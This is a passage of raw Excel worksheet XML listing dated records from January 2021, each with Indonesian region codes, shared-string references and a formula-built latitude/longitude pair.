        <v>16895</v>
      </c>
      <c r="W2720" s="5">
        <v>-335740</v>
      </c>
      <c r="X2720" t="s">
        <v>20635</v>
      </c>
      <c r="Y2720" t="str">
        <f t="shared" si="42"/>
        <v>-3.35740,114.60858</v>
      </c>
    </row>
    <row r="2721" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2721">
        <v>226384</v>
      </c>
      <c r="B2721" s="1">
        <v>44213</v>
      </c>
      <c r="C2721" s="2">
        <v>4.3923611111111115E-2</v>
      </c>
      <c r="D2721" t="s">
        <v>22</v>
      </c>
      <c r="E2721" t="s">
        <v>23</v>
      </c>
      <c r="F2721" t="s">
        <v>9206</v>
      </c>
      <c r="H2721" t="s">
        <v>7978</v>
      </c>
      <c r="I2721" t="s">
        <v>9207</v>
      </c>
      <c r="J2721" t="s">
        <v>3135</v>
      </c>
      <c r="L2721" t="s">
        <v>9208</v>
      </c>
      <c r="M2721">
        <v>3671020012</v>
      </c>
      <c r="N2721">
        <v>3671020</v>
      </c>
      <c r="O2721">
        <v>3671</v>
      </c>
      <c r="P2721">
        <v>36</v>
      </c>
      <c r="Q2721" t="s">
        <v>9209</v>
      </c>
      <c r="R2721" t="s">
        <v>274</v>
      </c>
      <c r="S2721" t="s">
        <v>201</v>
      </c>
      <c r="T2721" t="s">
        <v>171</v>
      </c>
      <c r="U2721" s="5">
        <v>10666581</v>
      </c>
      <c r="V2721" s="5" t="s">
        <v>16896</v>
      </c>
      <c r="W2721" s="5">
        <v>-619446</v>
      </c>
      <c r="X2721" t="s">
        <v>19976</v>
      </c>
      <c r="Y2721" t="str">
        <f t="shared" si="42"/>
        <v>-6.19446,106.66581</v>
      </c>
    </row>
    <row r="2722" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2722">
        <v>226385</v>
      </c>
      <c r="B2722" s="1">
        <v>44213</v>
      </c>
      <c r="C2722" s="2">
        <v>0.15731481481481482</v>
      </c>
      <c r="D2722" t="s">
        <v>22</v>
      </c>
      <c r="E2722" t="s">
        <v>23</v>
      </c>
      <c r="F2722" t="s">
        <v>9210</v>
      </c>
      <c r="G2722" t="s">
        <v>9211</v>
      </c>
      <c r="H2722" t="s">
        <v>26</v>
      </c>
      <c r="I2722" t="s">
        <v>27</v>
      </c>
      <c r="J2722" t="s">
        <v>6509</v>
      </c>
      <c r="M2722">
        <v>6371010006</v>
      </c>
      <c r="N2722">
        <v>6371010</v>
      </c>
      <c r="O2722">
        <v>6371</v>
      </c>
      <c r="P2722">
        <v>63</v>
      </c>
      <c r="Q2722" t="s">
        <v>8804</v>
      </c>
      <c r="R2722" t="s">
        <v>6511</v>
      </c>
      <c r="S2722" t="s">
        <v>6512</v>
      </c>
      <c r="T2722" t="s">
        <v>6513</v>
      </c>
      <c r="U2722" s="5">
        <v>11461873</v>
      </c>
      <c r="V2722" s="5" t="s">
        <v>16897</v>
      </c>
      <c r="W2722" s="5">
        <v>-335535</v>
      </c>
      <c r="X2722" t="s">
        <v>20636</v>
      </c>
      <c r="Y2722" t="str">
        <f t="shared" si="42"/>
        <v>-3.35535,114.61873</v>
      </c>
    </row>
    <row r="2723" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2723">
        <v>226386</v>
      </c>
      <c r="B2723" s="1">
        <v>44213</v>
      </c>
      <c r="C2723" s="2">
        <v>0.26796296296296296</v>
      </c>
      <c r="D2723" t="s">
        <v>22</v>
      </c>
      <c r="E2723" t="s">
        <v>23</v>
      </c>
      <c r="F2723" t="s">
        <v>9212</v>
      </c>
      <c r="G2723" t="s">
        <v>9213</v>
      </c>
      <c r="H2723" t="s">
        <v>26</v>
      </c>
      <c r="I2723" t="s">
        <v>137</v>
      </c>
      <c r="J2723" t="s">
        <v>6509</v>
      </c>
      <c r="L2723" t="s">
        <v>9214</v>
      </c>
      <c r="M2723">
        <v>6304060007</v>
      </c>
      <c r="N2723">
        <v>6304060</v>
      </c>
      <c r="O2723">
        <v>6304</v>
      </c>
      <c r="P2723">
        <v>63</v>
      </c>
      <c r="Q2723" t="s">
        <v>8849</v>
      </c>
      <c r="R2723" t="s">
        <v>8850</v>
      </c>
      <c r="S2723" t="s">
        <v>8851</v>
      </c>
      <c r="T2723" t="s">
        <v>6513</v>
      </c>
      <c r="U2723" s="5">
        <v>11460238</v>
      </c>
      <c r="V2723" s="5" t="s">
        <v>16898</v>
      </c>
      <c r="W2723" s="5">
        <v>-327060</v>
      </c>
      <c r="X2723" t="s">
        <v>20637</v>
      </c>
      <c r="Y2723" t="str">
        <f t="shared" si="42"/>
        <v>-3.27060,114.60238</v>
      </c>
    </row>
    <row r="2724" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2724">
        <v>226387</v>
      </c>
      <c r="B2724" s="1">
        <v>44213</v>
      </c>
      <c r="C2724" s="2">
        <v>0.35387731481481483</v>
      </c>
      <c r="D2724" t="s">
        <v>22</v>
      </c>
      <c r="E2724" t="s">
        <v>23</v>
      </c>
      <c r="F2724" t="s">
        <v>9215</v>
      </c>
      <c r="G2724" t="s">
        <v>9216</v>
      </c>
      <c r="H2724" t="s">
        <v>26</v>
      </c>
      <c r="I2724" t="s">
        <v>974</v>
      </c>
      <c r="J2724" t="s">
        <v>6509</v>
      </c>
      <c r="L2724" t="s">
        <v>9217</v>
      </c>
      <c r="M2724">
        <v>6304060007</v>
      </c>
      <c r="N2724">
        <v>6304060</v>
      </c>
      <c r="O2724">
        <v>6304</v>
      </c>
      <c r="P2724">
        <v>63</v>
      </c>
      <c r="Q2724" t="s">
        <v>8849</v>
      </c>
      <c r="R2724" t="s">
        <v>8850</v>
      </c>
      <c r="S2724" t="s">
        <v>8851</v>
      </c>
      <c r="T2724" t="s">
        <v>6513</v>
      </c>
      <c r="U2724" s="5">
        <v>11460515</v>
      </c>
      <c r="V2724" s="5" t="s">
        <v>16899</v>
      </c>
      <c r="W2724" s="5">
        <v>-327159</v>
      </c>
      <c r="X2724" t="s">
        <v>20638</v>
      </c>
      <c r="Y2724" t="str">
        <f t="shared" si="42"/>
        <v>-3.27159,114.60515</v>
      </c>
    </row>
    <row r="2725" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2725">
        <v>226388</v>
      </c>
      <c r="B2725" s="1">
        <v>44213</v>
      </c>
      <c r="C2725" s="2">
        <v>0.35645833333333332</v>
      </c>
      <c r="D2725" t="s">
        <v>22</v>
      </c>
      <c r="E2725" t="s">
        <v>23</v>
      </c>
      <c r="F2725" t="s">
        <v>9218</v>
      </c>
      <c r="G2725" t="s">
        <v>9219</v>
      </c>
      <c r="H2725" t="s">
        <v>26</v>
      </c>
      <c r="I2725" t="s">
        <v>6933</v>
      </c>
      <c r="J2725" t="s">
        <v>6509</v>
      </c>
      <c r="L2725" t="s">
        <v>9220</v>
      </c>
      <c r="M2725">
        <v>6307050008</v>
      </c>
      <c r="N2725">
        <v>6307050</v>
      </c>
      <c r="O2725">
        <v>6307</v>
      </c>
      <c r="P2725">
        <v>63</v>
      </c>
      <c r="Q2725" t="s">
        <v>8816</v>
      </c>
      <c r="R2725" t="s">
        <v>8817</v>
      </c>
      <c r="S2725" t="s">
        <v>8818</v>
      </c>
      <c r="T2725" t="s">
        <v>6513</v>
      </c>
      <c r="U2725" s="5">
        <v>11538597</v>
      </c>
      <c r="V2725" s="5" t="s">
        <v>16900</v>
      </c>
      <c r="W2725" s="5">
        <v>-258964</v>
      </c>
      <c r="X2725" t="s">
        <v>20639</v>
      </c>
      <c r="Y2725" t="str">
        <f t="shared" si="42"/>
        <v>-2.58964,115.38597</v>
      </c>
    </row>
    <row r="2726" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2726">
        <v>226389</v>
      </c>
      <c r="B2726" s="1">
        <v>44213</v>
      </c>
      <c r="C2726" s="2">
        <v>0.44278935185185181</v>
      </c>
      <c r="D2726" t="s">
        <v>22</v>
      </c>
      <c r="E2726" t="s">
        <v>23</v>
      </c>
      <c r="F2726" t="s">
        <v>9221</v>
      </c>
      <c r="H2726" t="s">
        <v>26</v>
      </c>
      <c r="I2726" t="s">
        <v>1891</v>
      </c>
      <c r="J2726" t="s">
        <v>2622</v>
      </c>
      <c r="L2726" t="s">
        <v>9222</v>
      </c>
      <c r="M2726">
        <v>3524190001</v>
      </c>
      <c r="N2726">
        <v>3524190</v>
      </c>
      <c r="O2726">
        <v>3524</v>
      </c>
      <c r="P2726">
        <v>35</v>
      </c>
      <c r="Q2726" t="s">
        <v>8711</v>
      </c>
      <c r="R2726" t="s">
        <v>8712</v>
      </c>
      <c r="S2726" t="s">
        <v>8713</v>
      </c>
      <c r="T2726" t="s">
        <v>1221</v>
      </c>
      <c r="U2726" s="5">
        <v>11234611</v>
      </c>
      <c r="V2726" s="5" t="s">
        <v>16901</v>
      </c>
      <c r="W2726" s="5">
        <v>-704956</v>
      </c>
      <c r="X2726" t="s">
        <v>20640</v>
      </c>
      <c r="Y2726" t="str">
        <f t="shared" si="42"/>
        <v>-7.04956,112.34611</v>
      </c>
    </row>
    <row r="2727" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2727">
        <v>226390</v>
      </c>
      <c r="B2727" s="1">
        <v>44213</v>
      </c>
      <c r="C2727" s="2">
        <v>0.72499999999999998</v>
      </c>
      <c r="D2727" t="s">
        <v>22</v>
      </c>
      <c r="E2727" t="s">
        <v>23</v>
      </c>
      <c r="F2727" t="s">
        <v>9223</v>
      </c>
      <c r="G2727" t="s">
        <v>9224</v>
      </c>
      <c r="H2727" t="s">
        <v>26</v>
      </c>
      <c r="I2727" t="s">
        <v>628</v>
      </c>
      <c r="J2727" t="s">
        <v>6509</v>
      </c>
      <c r="L2727" t="s">
        <v>9225</v>
      </c>
      <c r="M2727">
        <v>6303051008</v>
      </c>
      <c r="N2727">
        <v>6303051</v>
      </c>
      <c r="O2727">
        <v>6303</v>
      </c>
      <c r="P2727">
        <v>63</v>
      </c>
      <c r="Q2727" t="s">
        <v>9226</v>
      </c>
      <c r="R2727" t="s">
        <v>9093</v>
      </c>
      <c r="S2727" t="s">
        <v>8751</v>
      </c>
      <c r="T2727" t="s">
        <v>6513</v>
      </c>
      <c r="U2727" s="5">
        <v>11486467</v>
      </c>
      <c r="V2727" s="5" t="s">
        <v>16902</v>
      </c>
      <c r="W2727" s="5">
        <v>-337198</v>
      </c>
      <c r="X2727" t="s">
        <v>20641</v>
      </c>
      <c r="Y2727" t="str">
        <f t="shared" si="42"/>
        <v>-3.37198,114.86467</v>
      </c>
    </row>
    <row r="2728" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2728">
        <v>226391</v>
      </c>
      <c r="B2728" s="1">
        <v>44213</v>
      </c>
      <c r="C2728" s="2">
        <v>0.73435185185185192</v>
      </c>
      <c r="D2728" t="s">
        <v>22</v>
      </c>
      <c r="E2728" t="s">
        <v>23</v>
      </c>
      <c r="F2728" t="s">
        <v>9227</v>
      </c>
      <c r="G2728" t="s">
        <v>9228</v>
      </c>
      <c r="H2728" t="s">
        <v>26</v>
      </c>
      <c r="I2728" t="s">
        <v>1498</v>
      </c>
      <c r="J2728" t="s">
        <v>7436</v>
      </c>
      <c r="L2728" t="s">
        <v>9229</v>
      </c>
      <c r="M2728">
        <v>6102070002</v>
      </c>
      <c r="N2728">
        <v>6102070</v>
      </c>
      <c r="O2728">
        <v>6102</v>
      </c>
      <c r="P2728">
        <v>61</v>
      </c>
      <c r="Q2728" t="s">
        <v>9230</v>
      </c>
      <c r="R2728" t="s">
        <v>9231</v>
      </c>
      <c r="S2728" t="s">
        <v>9232</v>
      </c>
      <c r="T2728" t="s">
        <v>7441</v>
      </c>
      <c r="U2728" s="5">
        <v>10983547</v>
      </c>
      <c r="V2728" s="5" t="s">
        <v>16903</v>
      </c>
      <c r="W2728" s="5">
        <v>115589</v>
      </c>
      <c r="X2728" t="s">
        <v>20642</v>
      </c>
      <c r="Y2728" t="str">
        <f t="shared" si="42"/>
        <v>1.15589,109.83547</v>
      </c>
    </row>
    <row r="2729" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2729">
        <v>226392</v>
      </c>
      <c r="B2729" s="1">
        <v>44213</v>
      </c>
      <c r="C2729" s="2">
        <v>0.76785879629629628</v>
      </c>
      <c r="D2729" t="s">
        <v>22</v>
      </c>
      <c r="E2729" t="s">
        <v>23</v>
      </c>
      <c r="F2729" t="s">
        <v>9233</v>
      </c>
      <c r="G2729" t="s">
        <v>9234</v>
      </c>
      <c r="H2729" t="s">
        <v>26</v>
      </c>
      <c r="I2729" t="s">
        <v>2196</v>
      </c>
      <c r="J2729" t="s">
        <v>6509</v>
      </c>
      <c r="L2729" t="s">
        <v>9235</v>
      </c>
      <c r="M2729">
        <v>6371020003</v>
      </c>
      <c r="N2729">
        <v>6371020</v>
      </c>
      <c r="O2729">
        <v>6371</v>
      </c>
      <c r="P2729">
        <v>63</v>
      </c>
      <c r="Q2729" t="s">
        <v>8940</v>
      </c>
      <c r="R2729" t="s">
        <v>8795</v>
      </c>
      <c r="S2729" t="s">
        <v>6512</v>
      </c>
      <c r="T2729" t="s">
        <v>6513</v>
      </c>
      <c r="U2729" s="5">
        <v>11461562</v>
      </c>
      <c r="V2729" s="5" t="s">
        <v>16904</v>
      </c>
      <c r="W2729" s="5">
        <v>-333416</v>
      </c>
      <c r="X2729" t="s">
        <v>20643</v>
      </c>
      <c r="Y2729" t="str">
        <f t="shared" si="42"/>
        <v>-3.33416,114.61562</v>
      </c>
    </row>
    <row r="2730" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2730">
        <v>226393</v>
      </c>
      <c r="B2730" s="1">
        <v>44214</v>
      </c>
      <c r="C2730" s="2">
        <v>0.16818287037037039</v>
      </c>
      <c r="D2730" t="s">
        <v>22</v>
      </c>
      <c r="E2730" t="s">
        <v>23</v>
      </c>
      <c r="F2730" t="s">
        <v>9236</v>
      </c>
      <c r="H2730" t="s">
        <v>7086</v>
      </c>
      <c r="I2730" t="s">
        <v>7733</v>
      </c>
      <c r="J2730" t="s">
        <v>9237</v>
      </c>
      <c r="L2730" t="s">
        <v>9238</v>
      </c>
      <c r="M2730">
        <v>3173080004</v>
      </c>
      <c r="N2730">
        <v>3173080</v>
      </c>
      <c r="O2730">
        <v>3173</v>
      </c>
      <c r="P2730">
        <v>31</v>
      </c>
      <c r="Q2730" t="s">
        <v>4745</v>
      </c>
      <c r="R2730" t="s">
        <v>157</v>
      </c>
      <c r="S2730" t="s">
        <v>62</v>
      </c>
      <c r="T2730" t="s">
        <v>33</v>
      </c>
      <c r="U2730" s="5">
        <v>10683003</v>
      </c>
      <c r="V2730" s="5" t="s">
        <v>16905</v>
      </c>
      <c r="W2730" s="5">
        <v>-616763</v>
      </c>
      <c r="X2730" t="s">
        <v>20644</v>
      </c>
      <c r="Y2730" t="str">
        <f t="shared" si="42"/>
        <v>-6.16763,106.83003</v>
      </c>
    </row>
    <row r="2731" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2731">
        <v>226394</v>
      </c>
      <c r="B2731" s="1">
        <v>44214</v>
      </c>
      <c r="C2731" s="2">
        <v>0.49226851851851849</v>
      </c>
      <c r="D2731" t="s">
        <v>22</v>
      </c>
      <c r="E2731" t="s">
        <v>23</v>
      </c>
      <c r="F2731" t="s">
        <v>9239</v>
      </c>
      <c r="H2731" t="s">
        <v>7086</v>
      </c>
      <c r="I2731" t="s">
        <v>7499</v>
      </c>
      <c r="J2731" t="s">
        <v>8060</v>
      </c>
      <c r="L2731" t="s">
        <v>9240</v>
      </c>
      <c r="M2731">
        <v>7601041008</v>
      </c>
      <c r="N2731">
        <v>7601041</v>
      </c>
      <c r="O2731">
        <v>7601</v>
      </c>
      <c r="P2731">
        <v>76</v>
      </c>
      <c r="Q2731" t="s">
        <v>9241</v>
      </c>
      <c r="R2731" t="s">
        <v>9242</v>
      </c>
      <c r="S2731" t="s">
        <v>9243</v>
      </c>
      <c r="T2731" t="s">
        <v>8064</v>
      </c>
      <c r="U2731" s="5">
        <v>11890704</v>
      </c>
      <c r="V2731" s="5" t="s">
        <v>16906</v>
      </c>
      <c r="W2731" s="5">
        <v>-312919</v>
      </c>
      <c r="X2731" t="s">
        <v>20645</v>
      </c>
      <c r="Y2731" t="str">
        <f t="shared" si="42"/>
        <v>-3.12919,118.90704</v>
      </c>
    </row>
    <row r="2732" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2732">
        <v>226395</v>
      </c>
      <c r="B2732" s="1">
        <v>44214</v>
      </c>
      <c r="C2732" s="2">
        <v>0.51609953703703704</v>
      </c>
      <c r="D2732" t="s">
        <v>22</v>
      </c>
      <c r="E2732" t="s">
        <v>23</v>
      </c>
      <c r="F2732" t="s">
        <v>9244</v>
      </c>
      <c r="H2732" t="s">
        <v>26</v>
      </c>
      <c r="I2732" t="s">
        <v>1843</v>
      </c>
      <c r="J2732" t="s">
        <v>2622</v>
      </c>
      <c r="L2732" t="s">
        <v>9245</v>
      </c>
      <c r="M2732">
        <v>3573050006</v>
      </c>
      <c r="N2732">
        <v>3573050</v>
      </c>
      <c r="O2732">
        <v>3573</v>
      </c>
      <c r="P2732">
        <v>35</v>
      </c>
      <c r="Q2732" t="s">
        <v>9246</v>
      </c>
      <c r="R2732" t="s">
        <v>9246</v>
      </c>
      <c r="S2732" t="s">
        <v>6321</v>
      </c>
      <c r="T2732" t="s">
        <v>1221</v>
      </c>
      <c r="U2732" s="5">
        <v>11263147</v>
      </c>
      <c r="V2732" s="5" t="s">
        <v>16907</v>
      </c>
      <c r="W2732" s="5">
        <v>-795312</v>
      </c>
      <c r="X2732" t="s">
        <v>20646</v>
      </c>
      <c r="Y2732" t="str">
        <f t="shared" si="42"/>
        <v>-7.95312,112.63147</v>
      </c>
    </row>
    <row r="2733" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2733">
        <v>226396</v>
      </c>
      <c r="B2733" s="1">
        <v>44214</v>
      </c>
      <c r="C2733" s="2">
        <v>0.89513888888888893</v>
      </c>
      <c r="D2733" t="s">
        <v>22</v>
      </c>
      <c r="E2733" t="s">
        <v>23</v>
      </c>
      <c r="F2733" t="s">
        <v>9247</v>
      </c>
      <c r="H2733" t="s">
        <v>26</v>
      </c>
      <c r="I2733" t="s">
        <v>2139</v>
      </c>
      <c r="J2733" t="s">
        <v>2608</v>
      </c>
      <c r="L2733" t="s">
        <v>9248</v>
      </c>
      <c r="M2733">
        <v>3375040007</v>
      </c>
      <c r="N2733">
        <v>3375040</v>
      </c>
      <c r="O2733">
        <v>3375</v>
      </c>
      <c r="P2733">
        <v>33</v>
      </c>
      <c r="Q2733" t="s">
        <v>9249</v>
      </c>
      <c r="R2733" t="s">
        <v>7339</v>
      </c>
      <c r="S2733" t="s">
        <v>6246</v>
      </c>
      <c r="T2733" t="s">
        <v>1134</v>
      </c>
      <c r="U2733" s="5">
        <v>10968087</v>
      </c>
      <c r="V2733" s="5" t="s">
        <v>16908</v>
      </c>
      <c r="W2733" s="5">
        <v>-687600</v>
      </c>
      <c r="X2733" t="s">
        <v>20647</v>
      </c>
      <c r="Y2733" t="str">
        <f t="shared" si="42"/>
        <v>-6.87600,109.68087</v>
      </c>
    </row>
    <row r="2734" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2734">
        <v>226397</v>
      </c>
      <c r="B2734" s="1">
        <v>44215</v>
      </c>
      <c r="C2734" s="2">
        <v>5.5949074074074075E-2</v>
      </c>
      <c r="D2734" t="s">
        <v>22</v>
      </c>
      <c r="E2734" t="s">
        <v>23</v>
      </c>
      <c r="F2734" t="s">
        <v>9250</v>
      </c>
      <c r="H2734" t="s">
        <v>26</v>
      </c>
      <c r="I2734" t="s">
        <v>137</v>
      </c>
      <c r="J2734" t="s">
        <v>2622</v>
      </c>
      <c r="L2734" t="s">
        <v>9251</v>
      </c>
      <c r="M2734">
        <v>3571020016</v>
      </c>
      <c r="N2734">
        <v>3571020</v>
      </c>
      <c r="O2734">
        <v>3571</v>
      </c>
      <c r="P2734">
        <v>35</v>
      </c>
      <c r="Q2734" t="s">
        <v>9252</v>
      </c>
      <c r="R2734" t="s">
        <v>8364</v>
      </c>
      <c r="S2734" t="s">
        <v>8365</v>
      </c>
      <c r="T2734" t="s">
        <v>1221</v>
      </c>
      <c r="U2734" s="5">
        <v>11201335</v>
      </c>
      <c r="V2734" s="5" t="s">
        <v>16909</v>
      </c>
      <c r="W2734" s="5">
        <v>-781394</v>
      </c>
      <c r="X2734" t="s">
        <v>20648</v>
      </c>
      <c r="Y2734" t="str">
        <f t="shared" si="42"/>
        <v>-7.81394,112.01335</v>
      </c>
    </row>
    <row r="2735" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2735">
        <v>226398</v>
      </c>
      <c r="B2735" s="1">
        <v>44215</v>
      </c>
      <c r="C2735" s="2">
        <v>5.8541666666666665E-2</v>
      </c>
      <c r="D2735" t="s">
        <v>22</v>
      </c>
      <c r="E2735" t="s">
        <v>23</v>
      </c>
      <c r="F2735" t="s">
        <v>9253</v>
      </c>
      <c r="H2735" t="s">
        <v>26</v>
      </c>
      <c r="I2735" t="s">
        <v>1055</v>
      </c>
      <c r="J2735" t="s">
        <v>2622</v>
      </c>
      <c r="L2735" t="s">
        <v>9254</v>
      </c>
      <c r="M2735">
        <v>3571010007</v>
      </c>
      <c r="N2735">
        <v>3571010</v>
      </c>
      <c r="O2735">
        <v>3571</v>
      </c>
      <c r="P2735">
        <v>35</v>
      </c>
      <c r="Q2735" t="s">
        <v>9255</v>
      </c>
      <c r="R2735" t="s">
        <v>8660</v>
      </c>
      <c r="S2735" t="s">
        <v>8365</v>
      </c>
      <c r="T2735" t="s">
        <v>1221</v>
      </c>
      <c r="U2735" s="5">
        <v>11200553</v>
      </c>
      <c r="V2735" s="5" t="s">
        <v>16910</v>
      </c>
      <c r="W2735" s="5">
        <v>-781823</v>
      </c>
      <c r="X2735" t="s">
        <v>20649</v>
      </c>
      <c r="Y2735" t="str">
        <f t="shared" si="42"/>
        <v>-7.81823,112.00553</v>
      </c>
    </row>
    <row r="2736" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2736">
        <v>226399</v>
      </c>
      <c r="B2736" s="1">
        <v>44215</v>
      </c>
      <c r="C2736" s="2">
        <v>6.6666666666666666E-2</v>
      </c>
      <c r="D2736" t="s">
        <v>2648</v>
      </c>
      <c r="E2736" t="s">
        <v>23</v>
      </c>
      <c r="G2736" t="s">
        <v>9256</v>
      </c>
      <c r="H2736" t="s">
        <v>26</v>
      </c>
      <c r="J2736" t="s">
        <v>9257</v>
      </c>
      <c r="L2736" t="s">
        <v>2766</v>
      </c>
      <c r="M2736">
        <v>3174010005</v>
      </c>
      <c r="N2736">
        <v>3174010</v>
      </c>
      <c r="O2736">
        <v>3174</v>
      </c>
      <c r="P2736">
        <v>31</v>
      </c>
      <c r="Q2736" t="s">
        <v>251</v>
      </c>
      <c r="R2736" t="s">
        <v>69</v>
      </c>
      <c r="S2736" t="s">
        <v>32</v>
      </c>
      <c r="T2736" t="s">
        <v>33</v>
      </c>
      <c r="U2736" s="5">
        <v>10673377</v>
      </c>
      <c r="V2736" s="5" t="s">
        <v>16911</v>
      </c>
      <c r="W2736" s="5">
        <v>-618797</v>
      </c>
      <c r="X2736" t="s">
        <v>20650</v>
      </c>
      <c r="Y2736" t="str">
        <f t="shared" si="42"/>
        <v>-6.18797,106.73377</v>
      </c>
    </row>
    <row r="2737" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2737">
        <v>226412</v>
      </c>
      <c r="B2737" s="1">
        <v>44215</v>
      </c>
      <c r="C2737" s="2">
        <v>0.14385416666666667</v>
      </c>
      <c r="D2737" t="s">
        <v>22</v>
      </c>
      <c r="E2737" t="s">
        <v>23</v>
      </c>
      <c r="F2737" t="s">
        <v>9258</v>
      </c>
      <c r="G2737" t="s">
        <v>9259</v>
      </c>
      <c r="H2737" t="s">
        <v>26</v>
      </c>
      <c r="I2737" t="s">
        <v>137</v>
      </c>
      <c r="J2737" t="s">
        <v>6509</v>
      </c>
      <c r="L2737" t="s">
        <v>9260</v>
      </c>
      <c r="M2737">
        <v>6305050006</v>
      </c>
      <c r="N2737">
        <v>6305050</v>
      </c>
      <c r="O2737">
        <v>6305</v>
      </c>
      <c r="P2737">
        <v>63</v>
      </c>
      <c r="Q2737" t="s">
        <v>8837</v>
      </c>
      <c r="R2737" t="s">
        <v>8838</v>
      </c>
      <c r="S2737" t="s">
        <v>8839</v>
      </c>
      <c r="T2737" t="s">
        <v>6513</v>
      </c>
      <c r="U2737" s="5">
        <v>11536985</v>
      </c>
      <c r="V2737" s="5" t="s">
        <v>16912</v>
      </c>
      <c r="W2737" s="5">
        <v>-292932</v>
      </c>
      <c r="X2737" t="s">
        <v>20651</v>
      </c>
      <c r="Y2737" t="str">
        <f t="shared" si="42"/>
        <v>-2.92932,115.36985</v>
      </c>
    </row>
    <row r="2738" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2738">
        <v>226414</v>
      </c>
      <c r="B2738" s="1">
        <v>44215</v>
      </c>
      <c r="C2738" s="2">
        <v>0.15319444444444444</v>
      </c>
      <c r="D2738" t="s">
        <v>22</v>
      </c>
      <c r="E2738" t="s">
        <v>23</v>
      </c>
      <c r="F2738" t="s">
        <v>9261</v>
      </c>
      <c r="H2738" t="s">
        <v>9262</v>
      </c>
      <c r="I2738" t="s">
        <v>9263</v>
      </c>
      <c r="J2738" t="s">
        <v>2622</v>
      </c>
      <c r="L2738" t="s">
        <v>9264</v>
      </c>
      <c r="M2738">
        <v>3573040003</v>
      </c>
      <c r="N2738">
        <v>3573040</v>
      </c>
      <c r="O2738">
        <v>3573</v>
      </c>
      <c r="P2738">
        <v>35</v>
      </c>
      <c r="Q2738" t="s">
        <v>9265</v>
      </c>
      <c r="R2738" t="s">
        <v>8668</v>
      </c>
      <c r="S2738" t="s">
        <v>6321</v>
      </c>
      <c r="T2738" t="s">
        <v>1221</v>
      </c>
      <c r="U2738" s="5">
        <v>11264466</v>
      </c>
      <c r="V2738" s="5" t="s">
        <v>16913</v>
      </c>
      <c r="W2738" s="5">
        <v>-798145</v>
      </c>
      <c r="X2738" t="s">
        <v>20652</v>
      </c>
      <c r="Y2738" t="str">
        <f t="shared" si="42"/>
        <v>-7.98145,112.64466</v>
      </c>
    </row>
    <row r="2739" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2739">
        <v>226415</v>
      </c>
      <c r="B2739" s="1">
        <v>44215</v>
      </c>
      <c r="C2739" s="2">
        <v>0.16745370370370372</v>
      </c>
      <c r="D2739" t="s">
        <v>22</v>
      </c>
      <c r="E2739" t="s">
        <v>23</v>
      </c>
      <c r="F2739" t="s">
        <v>9266</v>
      </c>
      <c r="G2739" t="s">
        <v>9267</v>
      </c>
      <c r="H2739" t="s">
        <v>26</v>
      </c>
      <c r="I2739" t="s">
        <v>193</v>
      </c>
      <c r="J2739" t="s">
        <v>1656</v>
      </c>
      <c r="L2739" t="s">
        <v>9268</v>
      </c>
      <c r="M2739">
        <v>3173080003</v>
      </c>
      <c r="N2739">
        <v>3173080</v>
      </c>
      <c r="O2739">
        <v>3173</v>
      </c>
      <c r="P2739">
        <v>31</v>
      </c>
      <c r="Q2739" t="s">
        <v>157</v>
      </c>
      <c r="R2739" t="s">
        <v>157</v>
      </c>
      <c r="S2739" t="s">
        <v>62</v>
      </c>
      <c r="T2739" t="s">
        <v>33</v>
      </c>
      <c r="U2739" s="5">
        <v>10682715</v>
      </c>
      <c r="V2739" s="5" t="s">
        <v>16381</v>
      </c>
      <c r="W2739" s="5">
        <v>-617539</v>
      </c>
      <c r="X2739" t="s">
        <v>19329</v>
      </c>
      <c r="Y2739" t="str">
        <f t="shared" si="42"/>
        <v>-6.17539,106.82715</v>
      </c>
    </row>
    <row r="2740" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2740">
        <v>226418</v>
      </c>
      <c r="B2740" s="1">
        <v>44215</v>
      </c>
      <c r="C2740" s="2">
        <v>0.17216435185185186</v>
      </c>
      <c r="D2740" t="s">
        <v>22</v>
      </c>
      <c r="E2740" t="s">
        <v>23</v>
      </c>
      <c r="F2740" t="s">
        <v>9269</v>
      </c>
      <c r="G2740" t="s">
        <v>9270</v>
      </c>
      <c r="H2740" t="s">
        <v>26</v>
      </c>
      <c r="I2740" t="s">
        <v>5397</v>
      </c>
      <c r="J2740" t="s">
        <v>2622</v>
      </c>
      <c r="L2740" t="s">
        <v>9271</v>
      </c>
      <c r="M2740">
        <v>3571020007</v>
      </c>
      <c r="N2740">
        <v>3571020</v>
      </c>
      <c r="O2740">
        <v>3571</v>
      </c>
      <c r="P2740">
        <v>35</v>
      </c>
      <c r="Q2740" t="s">
        <v>9272</v>
      </c>
      <c r="R2740" t="s">
        <v>8364</v>
      </c>
      <c r="S2740" t="s">
        <v>8365</v>
      </c>
      <c r="T2740" t="s">
        <v>1221</v>
      </c>
      <c r="U2740" s="5">
        <v>11200982</v>
      </c>
      <c r="V2740" s="5" t="s">
        <v>16914</v>
      </c>
      <c r="W2740" s="5">
        <v>-782344</v>
      </c>
      <c r="X2740" t="s">
        <v>20653</v>
      </c>
      <c r="Y2740" t="str">
        <f t="shared" si="42"/>
        <v>-7.82344,112.00982</v>
      </c>
    </row>
    <row r="2741" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2741">
        <v>226420</v>
      </c>
      <c r="B2741" s="1">
        <v>44215</v>
      </c>
      <c r="C2741" s="2">
        <v>0.1804513888888889</v>
      </c>
      <c r="D2741" t="s">
        <v>22</v>
      </c>
      <c r="E2741" t="s">
        <v>23</v>
      </c>
      <c r="F2741" t="s">
        <v>9273</v>
      </c>
      <c r="G2741" t="s">
        <v>9274</v>
      </c>
      <c r="H2741" t="s">
        <v>26</v>
      </c>
